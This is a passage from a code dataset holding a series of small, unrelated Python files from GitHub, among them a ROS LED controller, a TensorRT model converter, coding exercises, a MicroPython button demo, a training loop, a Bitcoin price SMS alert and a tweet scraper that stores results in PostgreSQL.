Unrecognized BLINK identifier: \\\"%s\\\"\" % (id))\n return\n\n if config == \"duty-cycle\":\n rospy.loginfo(rospy.get_caller_id() + \": Configuring duty cycle for %s to %d\" % (id, value))\n _controller.setBlinkDutyCycle(blinkID, value)\n elif config.config == \"period\":\n rospy.loginfo(rospy.get_caller_id() + \": Configuring period for %s to %d\" % (id, value))\n _controller.setBlinkPeriod(blinkID, value)\n else:\n rospy.logwarn(rospy.get_caller_id() + \": Unsupported configuration \\\"%s\\\"\" % (config))\n return\n\n# Main node function.\nif __name__ == '__main__':\n _controller = PCA9530()\n _controller.open(1)\n\n rospy.init_node(\"led_controller_node\", anonymous=True)\n rospy.Subscriber(\"action\", String, messageCallback)\n\n rospy.spin()\n _controller.close()\n","repo_name":"hugbed/strabus-ros","sub_path":"led/led_controller/src/led_controller_node.py","file_name":"led_controller_node.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3686541190","text":"import functools\n\ndef decor(fun):\n @functools.wraps(fun)\n def wrapper(*args,**kwargs):\n c = 'number is : '\n c = c + fun(*args,**kwargs)\n return c\n return wrapper\n \n \n@decor \ndef one(a):\n if a == 'one':\n return '1'\n elif a == 'two':\n return '2'\n\n\nc = 
one('one')\n\nprint(c)\nprint(one.__name__)\nhelp(one)","repo_name":"prernaniraj/Python-Basics-Practice","sub_path":"decorator3.py","file_name":"decorator3.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74589677264","text":"import tensorflow as tf\nfrom PIL import Image\nimport numpy as np\n\ntf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\nimport tensorflow.compat.v1 as tf1\n\ntf1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\nfrom tensorflow.python.compiler.tensorrt import trt_convert as trt\nimport argparse\nfrom tensorflow.python.util import deprecation\n\ndeprecation._PRINT_DEPRECATION_WARNINGS = False\n\nDEFAULT_FROZEN_GRAPH_NAME = \"frozen_inference_graph.pb\"\nDEFAULT_MAX_BATCHSIZE = 1\nDEFAULT_INPUT_NAME = \"image_tensor\"\nDEFAULT_BOXES_NAME = \"detection_boxes\"\nDEFAULT_CLASSES_NAME = \"detection_classes\"\nDEFAULT_SCORES_NAME = \"detection_scores\"\nDEFAULT_NUM_DETECTIONS_NAME = \"num_detections\"\nDEFAULT_PRECISION = \"FP32\"\nDEFAULT_NMS = False\n# Default workspace size : 512MB\nDEFAULT_MAX_WORKSPACE_SIZE = 1 << 29\nDEFAULT_MIN_SEGMENT_SIZE = 10\nDEFAULT_GPU_MEMORY_FRACTION = 0.6\n\nTfConfig = tf.ConfigProto()\n# TfConfig.gpu_options.allow_growth=True\nTfConfig.gpu_options.allow_growth = False\nTfConfig.gpu_options.per_process_gpu_memory_fraction = DEFAULT_GPU_MEMORY_FRACTION\n\n\ndef loadGraphDef(modelFile):\n graphDef = tf.GraphDef()\n with open(modelFile, \"rb\") as f:\n graphDef.ParseFromString(f.read())\n return graphDef\n\n\ndef saveGraphDef(graphDef, outputFilePath):\n with open(outputFilePath, \"wb\") as f:\n f.write(graphDef.SerializeToString())\n print(\"---------saved graphdef to {}\".format(outputFilePath))\n\n\ndef updateNmsCpu(graphDef):\n for node in graphDef.node:\n # if 'NonMaxSuppressionV' in node.name and not node.device:\n if \"NonMaxSuppression\" in node.name and \"TRTEngineOp\" not in node.name:\n # node.device = '/device:CPU:0'\n node.device = \"/job:localhost/replica:0/task:0/device:CPU:0\"\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Offline tf-trt GraphDef\")\n parser.add_argument(\n \"--modelPath\",\n type=str,\n default=DEFAULT_FROZEN_GRAPH_NAME,\n help=\"path to frozen model\",\n required=True,\n )\n parser.add_argument(\n \"--gpu_mem_fraction\",\n type=float,\n default=DEFAULT_GPU_MEMORY_FRACTION,\n help=\"Tensorflow gpu memory fraction, suggested value [0.2, 0.6]\",\n )\n parser.add_argument(\n \"--nms\", type=bool, default=DEFAULT_NMS, help=\"to offload NMS operation to CPU\"\n ),\n parser.add_argument(\n \"--precision\", type=str, default=DEFAULT_PRECISION, help=\"Precision mode to use\"\n )\n parser.add_argument(\n \"--max_batch_size\",\n type=int,\n default=DEFAULT_MAX_BATCHSIZE,\n help=\"Specify max batch size\",\n )\n parser.add_argument(\n \"--save_graph\", type=str, default=None, help=\"TF-TRT optimized model file\"\n )\n parser.add_argument(\n \"--min_segment_size\",\n type=int,\n default=DEFAULT_MIN_SEGMENT_SIZE,\n help=\"the minimum number of nodes required for a subgraph to be replaced by TRTEngineOp\",\n )\n args = parser.parse_args()\n saveGraphPath = args.save_graph\n if not saveGraphPath:\n saveGraphPath = (\n \"frozen_tfrtr_\"\n + args.precision.lower()\n + \"_bs\"\n + str(args.max_batch_size)\n + \"_mss\"\n + str(args.min_segment_size)\n + \".pb\"\n )\n TfConfig.gpu_options.per_process_gpu_memory_fraction = args.gpu_mem_fraction\n outputNames = [\n DEFAULT_BOXES_NAME,\n 
DEFAULT_CLASSES_NAME,\n DEFAULT_SCORES_NAME,\n DEFAULT_NUM_DETECTIONS_NAME,\n ]\n nnGraphDef = loadGraphDef(args.modelPath)\n converter = trt.TrtGraphConverter(\n is_dynamic_op=True,\n input_graph_def=nnGraphDef,\n nodes_blacklist=outputNames,\n max_batch_size=args.max_batch_size,\n max_workspace_size_bytes=DEFAULT_MAX_WORKSPACE_SIZE,\n precision_mode=args.precision,\n minimum_segment_size=args.min_segment_size,\n )\n trtGraphDef = converter.convert()\n print(\"-------tf-trt model has been rebuilt.\")\n if args.nms == True:\n # Update NMS to CPU and save the model\n print(\"-------updateNMS to CPU.\")\n updateNmsCpu(trtGraphDef)\n saveGraphPath = \"nms_\" + saveGraphPath\n saveGraphDef(trtGraphDef, saveGraphPath)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NVIDIA-AI-IOT/deepstream_triton_model_deploy","sub_path":"faster_rcnn_inception_v2/export_nms_only.py","file_name":"export_nms_only.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"48"} +{"seq_id":"3563559769","text":"# Tuples are immutable, use tuples to avoid data being changed and causing errors.\n# If data in tuple needs to be changed create a list from tuple as below, then change list. This way tuple stays intact.\n\nyulia = [(\"welcome home sunshine\", \"Let me show you the master bedroom\", \"hello\"),\n (\"is blue\", \"is old\", \"hello\"),\n (\"is red\", \"has writing\", \"hello\")\n ]\n\nfor burp, thing, things in yulia:\n print(\"statement 1: {}, statement 2: {}, statement 3: {}\".format(burp[0], thing[1], things[2]))\n\n# print(yulia)\n# #print(yulia[0])\n# #print(yulia[1])\n# #print(yulia[2])\n# statement_1, statement_2, statement_3 = yulia\n# print(statement_1)\n# print(statement_2)\n# print(statement_3)\n# table = (\"coffee table\", 200, 100, 75, 34)\n# print(table[1] * table[2])\n# name, length, width, height, price = table\n# print(length * width)\n# print(str(yulia))","repo_name":"hyperblue1356/Helloworld_basics","sub_path":"tuples_intro.py","file_name":"tuples_intro.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40772963391","text":"''' demo of reading a button\n 2017-0808 PePo - added OLED display to demo\n Adafruit article:\n https://learn.adafruit.com/micropython-hardware-digital-i-slash-o/digital-inputs\n'''\nimport machine, time\nimport ssd1306\n\n__LED_PIN = const(14) #GPIO14\n__BUTTON_PIN = const(12) #GPIO12\n\n#define led to be set on / off by button\nled = machine.Pin(__LED_PIN, machine.Pin.OUT)\nled.off()\n# OPTIONAL: status of led: True=on, False=off\n# led_status = False\n\n# create i2c for OLED display\ni2c = machine.I2C(scl=machine.Pin(5), sda=machine.Pin(4), freq=100000)\nprint('i2c.scan: ', i2c.scan()) #[60]\n# OLED screen dimensions\n__WIDTH = const(128)\n__HEIGHT = const(32)\noled = ssd1306.SSD1306_I2C(__WIDTH, __HEIGHT, i2c)\n\n# define button on Pin GPIO12\nbutton = machine.Pin(__BUTTON_PIN, machine.Pin.IN, machine.Pin.PULL_UP)\n\n# helper to refresh OLED display\ndef refreshOLED(msg):\n oled.fill(0) # clear oled\n oled.text('Button demo',0,0) #header\n oled.text(msg,0,10)\n oled.show()\n\n# demo ...\ndef run():\n while True:\n first = button.value()\n time.sleep(0.01)\n second = button.value()\n if first and not second:\n print('Button pressed!')\n led.on()\n refreshOLED('LED: {0} '.format(led.value()))\n elif not first and second:\n print('Button released!')\n led.off()\n 
refreshOLED('LED: {0} '.format(led.value()))\n\n# run demo\ntry:\n print('Button demo, press button...')\n refreshOLED('Press button!')\n run()\nexcept:\n print('Done')\n refreshOLED('Done!')\n","repo_name":"flashypepo/myMicropython-Examples","sub_path":"button/demo_oled.py","file_name":"demo_oled.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1347545980","text":"import re\n\ndef decompress(compressed_string):\n \"\"\" Returns the length of decompressed string. \n \"\"\"\n decompressed_len = 0\n data_count = 0\n repeat = 0\n\n i = 0\n while i < len(compressed_string):\n\n # read the data sequence?\n if data_count > 0:\n decompressed_len += data_count * repeat\n i += data_count\n data_count, repeat = 0, 0\n continue\n\n # start of marker\n regex = re.compile(r'^\\(([0-9]+)x([0-9]+)\\)')\n if regex.match(compressed_string[i:]):\n data_count, repeat = regex.search(compressed_string[i:]).groups()\n i += len(data_count) + len(repeat) + 3\n data_count, repeat = int(data_count), int(repeat)\n continue\n \n # read normal character \n decompressed_len += 1\n i += 1\n\n return decompressed_len\n\n \ndef test(): \n for compressed_string in [\"ADVENT\", \"A(1x5)BC\", \"(3x3)XYZ\",\n \"A(2x2)BCD(2x2)EFG\", \"(6x1)(1x3)A\",\n \"X(8x2)(3x3)ABCY\"]: \n decompressed_string = decompress(compressed_string)\n \n print(decompressed_string)\n\n \n\nif __name__ == \"__main__\":\n compressed_string = open(\"input9.txt\").read().strip()\n print(decompress(compressed_string))\n \n","repo_name":"PetraVidnerova/AdventOfCode2016","sub_path":"day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74982299984","text":"# If we list all the natural numbers below 10 that are multiples of 3 or 5,\n# we get 3, 5, 6 and 9. The sum of these multiples is 23.\n# Find the sum of all the multiples of 3 or 5 below 1000.\n\n# observation: multiples of 3 include 3, 6, 9, ... 999 --> 3(n), n in [1, 333]\n# observation: multiples of 5 include 5, 10, 15, ... 
995 --> 5(n), n in [1, 199]\n# observation: must subtract those counted twice --> 15(n), n in [1, 66]\n\nimport time\n\ndef main():\n # method one - iterate through loops\n start = int(round(time.time() * 1000))\n sum = 0\n for i in range(333):\n sum += 3*(i+1)\n for i in range(199):\n sum += 5*(i+1)\n for i in range(66):\n sum -= 15*(i+1)\n print(sum)\n print(\"finished in \" + str(int(round(time.time() * 1000)) - start) + \"ms\")\n\n # finished in 0ms, no improvements necessary...\nmain()","repo_name":"jgross11/PE-problems","sub_path":"Problem 1.py","file_name":"Problem 1.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36505310527","text":"import torch.nn.functional as F\nimport torch.nn as nn\nfrom tqdm import tqdm\nfrom helper import HelperModel\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torch.utils.data import Dataset, random_split\nimport math\nfrom PIL import Image\nimport cv2\nimport numpy as np\nimport torch\nimport os\nfrom tqdm import notebook\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import transforms\nimport albumentations as A\nimport albumentations.pytorch as AP\nimport random\nfrom tqdm.notebook import tqdm\nfrom tqdm import tqdm_notebook\nimport time\nimport matplotlib.pyplot as plt\nfrom dice import dice_coefficient, iou_score\n\nclass Train(object):\n def __init__(self):\n self.train_losses = []\n self.train_acc = []\n self.train_lr = []\n\n def plot_cycle_lr(self):\n plt.plot(np.arange(1,25), self.train_lr)\n plt.xlabel('Epochs')\n plt.ylabel(\"Learning rate\")\n plt.title(\"Lr v/s Epochs\")\n plt.show()\n\n def train(self, model, device, train_loader, optimizer, criterion,l1_factor=None,scheduler=None ):\n model.train()\n pbar = tqdm(train_loader)\n correct = 0\n processed = 0\n print('LR:',optimizer.param_groups[0]['lr'])\n self.train_lr.append(optimizer.param_groups[0]['lr'])\n for batch_idx, (data, target) in enumerate(pbar):\n # get samples\n data, target = data.to(device), target.to(device)\n\n # Init\n optimizer.zero_grad()\n # In PyTorch, we need to set the gradients to zero before starting to do backpropragation because PyTorch accumulates the gradients on subsequent backward passes.\n # Because of this, when you start your training loop, ideally you should zero out the gradients so that you do the parameter update correctly.\n\n # Predict\n y_pred = model(data)\n # pdb.set_trace()\n # Calculate loss\n # loss = F.nll_loss(y_pred, target)\n # criterion = nn.CrossEntropyLoss()\n # loss = criterion(y_pred, target)\n\n loss = criterion(y_pred, target)\n\n # update l1 regularizer if requested\n if l1_factor:\n loss = HelperModel.apply_l1_regularizer(model, loss, l1_factor)\n self.train_losses.append(loss.item())\n\n # Backpropagation\n loss.backward()\n optimizer.step()\n if(scheduler):\n scheduler.step()\n\n # Update pbar-tqdm\n\n pred = y_pred.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n processed += len(data)\n\n pbar.set_description(desc=f'Train Set: Train Loss={loss.item()} Batch_id={batch_idx} Accuracy={100*correct/processed:0.2f}')\n acc = float(\"{:.2f}\".format(100 * correct / processed))\n # self.train_acc.append(100*correct/processed)\n self.train_acc.append(acc)\n \n\n\n def train_mask_depth(self,model, device, train_loader, optimizer, mask_criterion, depth_criterion, epoch, scheduler = False):\n 
running_mask_loss = 0\n running_depth_loss=0\n total_loss = 0\n mask_coef = 0\n depth_coef = 0\n model.train()\n pbar = tqdm(train_loader)\n total_length = len(train_loader)\n print('LR:',optimizer.param_groups[0]['lr'])\n self.train_lr.append(optimizer.param_groups[0]['lr'])\n self.train_losses = []\n self.train_acc = []\n acc_mask = 0\n acc_depth = 0\n iou_mask = 0\n iou_dense = 0\n\n for batch_idx, (data, mask_target, depth_target) in enumerate(pbar):\n # get samples\n data, mask_target, depth_target = data.to(device), mask_target.to(device), depth_target.to(device)\n\n optimizer.zero_grad()\n \n mask_target = mask_target.unsqueeze_(1)\n depth_target = depth_target.unsqueeze_(1)\n\n mask_target = torch.sigmoid(mask_target)\n depth_target = torch.sigmoid(depth_target)\n\n #Predict\n mask_pred, depth_pred = model(data)\n\n\n # Calculate loss\n \n mask_loss = mask_criterion( mask_pred,mask_target,)\n depth_loss = depth_criterion(depth_pred,depth_target)\n loss = mask_loss+ depth_loss\n running_mask_loss += mask_loss.item()\n running_depth_loss += depth_loss.item()\n\n total_loss += loss.item()\n\n # mask_coef += dice_coefficient(mask_pred,mask_target, mask= True).item()\n # depth_coef += dice_coefficient(depth_pred, depth_target, mask=False).item()\n\n iou_mask += iou_score(mask_pred.detach().cpu().numpy(), mask_target.detach().cpu().numpy())\n iou_dense += iou_score(depth_pred.detach().cpu().numpy(), depth_target.detach().cpu().numpy())\n \n # Backpropagation\n loss.backward()\n # torch.autograd.backward([mask_loss, depth_loss])\n\n optimizer.step()\n if(scheduler):\n scheduler.step()\n\n pbar.set_description(f'Loss={loss:0.4f}')\n \n\n # print(f'Mask Coeff ={mask_coef/total_length:0.4f}')\n # print(f'Depth TCoeff ={depth_coef/total_length:0.4f}')\n\n print(f'IOU Mask={iou_mask/total_length:0.4f}')\n print(f'IOU Depth={iou_dense/total_length:0.4f}')\n \n # train_losses.append((mask_loss/total_length,depth_loss/total_length))\n self.train_losses.append(total_loss/total_length)\n self.train_acc.append((mask_coef + depth_coef)/ total_length)\n # return self.train_losses, self.train_acc","repo_name":"ganeshkcs/EVA4B2","sub_path":"Utils/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37199214923","text":"def func(W, weights, values, N, DP):\r\n \"\"\"\r\n Same as - \"10_01knapsack.py\"\r\n\r\n Recursive\r\n\r\n Time O(N*W) | Space O(N*W)\r\n \"\"\"\r\n print(N, W)\r\n if W == 0:\r\n DP[W][N] = 0\r\n elif N == 0:\r\n DP[W][N] = 0\r\n elif DP[W][N] is not None:\r\n return DP[W][N]\r\n elif weights[N - 1] <= W:\r\n DP[W][N] = max(\r\n values[N - 1] + func(W - weights[N - 1], weights, values, N - 1, DP),\r\n func(W, weights, values, N - 1, DP),\r\n )\r\n else:\r\n DP[W][N] = func(W, weights, values, N - 1, DP)\r\n\r\n return DP[W][N]\r\n\r\n\r\ndef printKnapsackItems(DP, weights, values, W, N):\r\n items = []\r\n r, c = W, N\r\n while DP[r][c] != 0:\r\n if DP[r][c] == DP[r][c - 1]:\r\n c -= 1\r\n else:\r\n items.append([weights[c - 1], values[c - 1]])\r\n c -= 1\r\n r -= weights[c - 1]\r\n print(items[::-1])\r\n\r\n\r\nvalues = [6, 10, 12]\r\nweights = [1, 2, 3]\r\nW = 5\r\nN = len(weights)\r\nDP = [[None for i in range(N + 1)] for j in range(W + 1)]\r\nprint(func(W, weights, values, N, DP))\r\nprintKnapsackItems(DP, weights, values, W, N)\r\n","repo_name":"punisher21maximum/MyDSAVault","sub_path":"4 DP practice/2 
InterMediate/11_1_printing01knapsack_Recursive.py","file_name":"11_1_printing01knapsack_Recursive.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71467036306","text":"# 86. Partition List\n# https://leetcode.com/problems/partition-list/\n\n# Solution by: Javi Barranco\n\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n\nclass Solution:\n    def partition(self, head: [ListNode], x: int) -> [ListNode]:\n        if head == None or head.next == None: return head\n        \n        numbers = []\n        node = head\n        while node != None:\n            numbers.append(node.val)\n            node = node.next\n\n        front = []\n        back = []\n        for num in numbers:\n            if num < x:\n                front.append(num)\n            else:\n                back.append(num)\n        numbers = front + back\n\n        output = ListNode(numbers[0], None)\n        node = output\n        for i in range(1, len(numbers)):\n            node.next = ListNode(numbers[i], None)\n            node = node.next\n\n        return output\n    \n    def sameLinkedList(self, head1: [ListNode], head2: [ListNode]) -> bool:\n        while head1 != None and head2 != None:\n            if head1.val != head2.val:\n                return False\n            head1 = head1.next\n            head2 = head2.next\n        \n        return head1 == None and head2 == None\n    \n\nexercise = Solution()\ninput = ListNode(1, ListNode(4, ListNode(3, ListNode(2, ListNode(5, ListNode(2))))))\nexpected_output = ListNode(1, ListNode(2, ListNode(2, ListNode(4, ListNode(3, ListNode(5))))))\noutput = exercise.partition(input, 3)\nprint(output)\nassert exercise.sameLinkedList(output, expected_output), \"Wrong answer\"\nprint(\"Accepted\")\n","repo_name":"JaviBT/leetcode-problems","sub_path":"problems/_86_leetcode.py","file_name":"_86_leetcode.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25835463256","text":"import requests\r\n\r\n# Using a api link of a smsserver (REST API),\r\n# I have used Kavenegar that is a smsserver \r\ndef inform_me(price):\r\n    API_key = 'copy your api key of this smsserver here'\r\n    url = 'https://api.kavenegar.com/v1/{}/sms/send.json'.format(API_key)\r\n    payload = {'receptor':'', 'message':'Hi there, Bitcoin buy price is ${},\\nFrom Mahsa'.format(price)}\r\n    response=requests.post(url, data=payload)\r\n    print(response)\r\n    print('Hi there, Bitcoin buy price is ${},\\nFrom '.format(price))\r\n\r\nmy_buget = 40000\r\n#buy USD price\r\n# if it is not woring in your regin use proxies(proxy support)\r\nresponse=requests.get(\"https://api.coinbase.com/v2/prices/buy?currency=USD\")\r\nprice = float(response.json()['data']['amount'])\r\nprint('At this moment, bitcoin is',price)\r\nif price <= my_buget:\r\n    inform_me(price)\r\n","repo_name":"MahsaSai/API-Bitcoin","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28570676704","text":"# Dana jest lista zawierająca ciąg obustronnie domkniętych przedziałów.\n# Krańce przedziałów określa uporządkowana para liczb całkowitych. 
Proszę\n# napisać stosowne deklaracje oraz funkcję redukującą liczbę elementów listy.\n# Na przykład lista: [15,19] [2,5] [7,11] [8,12] [5,6] [13,17]\n# powinien zostać zredukowany do listy: [13,19] [2,6] [7,12]\n\nclass Node:\n    def __init__(self, val):\n        self.next = None\n        self.val = val\n\ndef merge(first):\n    p = first \n    while p is not None:\n        l = p\n        q = p.next\n        while q is not None:\n            new = scal(p.val, q.val)\n            if new:\n                p.val = new\n                l.next = q.next\n            else:\n                l = q\n            q = q.next\n        p = p.next\n\ndef scal(k1, k2):\n    if k1[1] >= k2[0] and k2[1] >= k1[0]:\n        return(min(k1[0], k2[0]), max(k1[1], k2[1]))\n    return None\n\n\n","repo_name":"klark142/Introduction_to_Computer_Science","sub_path":"Zestaw 7/zad20.py","file_name":"zad20.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23954241280","text":"GAMES = [\n    {\n        'name': 'Fifa',\n        'choices': [\n            'Ajax',\n            'Arsenal',\n            'Atlético',\n            'FC Barcelone',\n            'Bayern',\n            'Chelsea',\n            'Dortmund',\n            'Inter Milan',\n            'Juventus',\n            'Liverpool',\n            'Man. City',\n            'Man. United',\n            'Napoli',\n            'PSG',\n            'Real Madrid',\n            'Tottenham'\n        ],\n        'max': 2\n    },\n    {\n        'name': 'NHL',\n        'choices': [\n            'Hurricanes',\n            'Blue Jackets',\n            'Devils',\n            'Islanders',\n            'Rangers',\n            'Flyers',\n            'Penguins',\n            'Capitals',\n            'Bruins',\n            'Red Wings',\n            'Panthers',\n            'Canadiens',\n            'Senators',\n            'Lightning',\n            'Maple Leafs',\n            'Blackhawks',\n            'Avalanche',\n            'Wild',\n            'Stars',\n            'Predators',\n            'Blues',\n            'Jets',\n            'Ducks',\n            'Coyotes',\n            'Flames',\n            'Oilers',\n            'Kings',\n            'Canucks',\n            'Golden Knights'\n        ],\n        'max': 2\n    },\n    {\n        'name': 'Madden',\n        'choices': [\n            'Bills',\n            'Dolphins',\n            'Patriots',\n            'Jets',\n            'Ravens',\n            'Bengals',\n            'Browns',\n            'Steelers',\n            'Texans',\n            'Colts',\n            'Jaguars',\n            'Titans',\n            'Broncos',\n            'Chiefs',\n            'Chargers',\n            'Raiders',\n            'Cowboys',\n            'Giants',\n            'Eagles',\n            'Redskins',\n            'Bears',\n            'Lions',\n            'Packers',\n            'Vikings',\n            'Falcons',\n            'Panthers',\n            'Saints',\n            'Buccaneers',\n            'Cardinals',\n            'Rams',\n            '49ers',\n            'Seahawks'\n        ],\n        'max': 2\n    },\n    {\n        'name': 'Super Smash Bros',\n        'choices': [\n            'Mario',\n            'Donkey Kong',\n            'Link',\n            'Samus Aran',\n            'Dark Samus',\n            'Yoshi',\n            'Kirby',\n            'Fox',\n            'Pikachu',\n            'Luigi',\n            'Ness',\n            'Captain Falcon',\n            'Jigglypuff',\n            'Peach',\n            'Daisy',\n            'Bowser',\n            'Ice Climbers',\n            'Sheik',\n            'Zelda',\n            'Dr. Mario',\n            'Pichu',\n            'Falco',\n            'Marth',\n            'Lucina',\n            'Young Link',\n            'Ganondorf',\n            'Mewtwo',\n            'Roy',\n            'Chrom',\n            'Mr. Game & Watch',\n            'Meta Knight',\n            'Pit',\n            'Dark Pit',\n            'Zero Suit Samus',\n            'Wario',\n            'Snake',\n            'Ike',\n            'Pokemon Trainer',\n            'Diddy Kong',\n            'Lucas',\n            'Sonic',\n            'King Dedede',\n            'Olimar',\n            'Lucario',\n            'R.O.B.',\n            'Toon Link',\n            'Wolf',\n            'Villager',\n            'Mega Man',\n            'Wii Fit Trainer',\n            'Rosalina & Luma',\n            'Little Mac',\n            'Greninja',\n            'Mii Fighter (Brawler)',\n            'Mii Fighter (Swordfighter)',\n            'Mii Fighter (Gunner)',\n            'Palutena',\n            'Pac-Man',\n            'Robin',\n            'Shulk',\n            'Bowser Jr',\n            'Duck Hunt',\n            'Ryu',\n            'Ken',\n            'Cloud',\n            'Corrin',\n            'Bayonetta',\n            'Inkling',\n            'Ridley',\n            'Simon',\n            'Richter',\n            'King K. 
Rool',\n 'Isabelle',\n 'Incineroar'\n ],\n 'max': 4\n }\n]","repo_name":"papa-ours/server3x","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36121506708","text":"import sys\nimport os\nimport twint\nimport getopt\nimport psycopg2\nimport pandas as pd\nimport psycopg2.extras as extras\nfrom datetime import datetime\nfrom dotenv import load_dotenv\n\ndef conn_db():\n\n load_dotenv()\n \n DB_NAME = os.getenv('dbname')\n DB_USER = os.getenv('user')\n DB_HOST = os.getenv('host')\n DB_PASSWD = os.getenv('password')\n \n #print(\"dbname=\"+ DB_NAME + \" user=\" + DB_USER + \" host=\" + DB_HOST + \" password=\" + DB_PASSWD)\n \n conn = psycopg2.connect(\"dbname=\"+ DB_NAME + \" user=\" + DB_USER + \" host=\" + DB_HOST + \" password=\" + DB_PASSWD)\n \n return conn\n\ndef create_db(conn):\n \n cur = conn.cursor()\n\n cur.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS tweets (\n id VARCHAR(100),\n scrapping_date VARCHAR(15),\n scrapping_term VARCHAR(50),\n conversation_id VARCHAR(100),\n date_time VARCHAR(20),\n timezone INTEGER,\n user_id VARCHAR(100),\n username VARCHAR(15),\n name VARCHAR(50),\n tweet VARCHAR(500),\n language VARCHAR(10),\n replies_count INTEGER,\n retweets_count INTEGER,\n likes_count INTEGER,\n hashtags VARCHAR(400),\n link VARCHAR(100),\n quote_url VARCHAR(100),\n video INTEGER,\n reply_to VARCHAR(10000),\n thumbnail VARCHAR(150)\n );\n \"\"\"\n )\n\n conn.commit()\n\n cur.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS retweets (\n id VARCHAR(100),\n scrapping_date VARCHAR(15),\n scrapping_term VARCHAR(50),\n conversation_id VARCHAR(100),\n date_time VARCHAR(20),\n timezone INTEGER,\n user_id VARCHAR(100),\n username VARCHAR(15),\n name VARCHAR(50),\n tweet VARCHAR(500),\n language VARCHAR(10),\n replies_count INTEGER,\n retweets_count INTEGER,\n likes_count INTEGER,\n hashtags VARCHAR(400),\n link VARCHAR(100),\n video INTEGER,\n user_rt_id VARCHAR(100),\n user_rt VARCHAR(500),\n retweet_date VARCHAR(25),\n retweet_id VARCHAR(100),\n thumbnail VARCHAR(150)\n );\n \"\"\"\n )\n\n conn.commit()\n\n cur.close()\n #conn.close()\n\ndef insert_db_tweets(conn, dataframe, date, term):\n \"\"\"\n Using psycopg2.extras.execute_values() to insert the dataframe\n \"\"\"\n\n # Create a list of tupples from the dataframe values\n #tuples = [tuple(x) for x in dataframe.to_numpy()]\n \n \n tuples = []\n for x in dataframe.to_numpy():\n tuples.append((str(x[0]), str(date), str(term), str(x[1]), str(x[3]), \n str(x[4]), str(x[11]), str(x[12]), str(x[13]),\n str(x[6]), str(x[7]), str(x[23]), str(x[24]), str(x[22]), \n str(x[8]), str(x[16]), str(x[25]), str(x[19]), str(x[33]), str(x[20])))\n \n # SQL quert to execute\n query = \"\"\"\n INSERT into tweets(id, scrapping_date, scrapping_term, conversation_id, \n date_time, timezone, user_id, username, name, tweet, language, replies_count,\n retweets_count, likes_count, hashtags, link, quote_url, video, reply_to, thumbnail)\n VALUES %s;\n \"\"\"\n\n cursor = conn.cursor()\n try:\n extras.execute_values(cursor, query, tuples)\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: %s\" % error)\n conn.rollback()\n cursor.close()\n return 1\n print(\"insert_db_tweets() done\")\n cursor.close()\n\ndef insert_db_retweets(conn, dataframe, date, term):\n \"\"\"\n Using psycopg2.extras.execute_values() to insert the dataframe\n \"\"\"\n\n # Create a list of tupples from the 
dataframe values\n #tuples = [tuple(x) for x in dataframe.to_numpy()]\n\n tuples = []\n for x in dataframe.to_numpy():\n tuples.append((str(x[0]), str(date), str(term), str(x[1]), str(x[3]), \n str(x[4]), str(x[11]), str(x[12]), str(x[13]),\n str(x[6]), str(x[7]), str(x[23]), str(x[24]), str(x[22]), \n str(x[8]), str(x[16]), str(x[19]), str(x[30]),\n str(x[31]), str(x[34]), str(x[32]), str(x[20])))\n \n # SQL quert to execute\n query = \"\"\"\n INSERT into retweets(id, scrapping_date, scrapping_term, conversation_id, date_time, \n timezone, user_id, username, name, tweet, language, replies_count,\n retweets_count, likes_count, hashtags, link, video, user_rt_id,\n user_rt, retweet_date, retweet_id, thumbnail)\n VALUES %s;\n \"\"\"\n\n cursor = conn.cursor()\n try:\n extras.execute_values(cursor, query, tuples)\n conn.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: %s\" % error)\n conn.rollback()\n cursor.close()\n return 1\n print(\"insert_db_retweets() done\")\n cursor.close()\n\ndef get_tweets(hashtag, date_since, date_until):\n \n t = twint.Config() # Inicializa\n t.Search = hashtag\n t.Since = date_since\n t.Until = date_until\n t.Retweets = True\n t.Pandas = True # 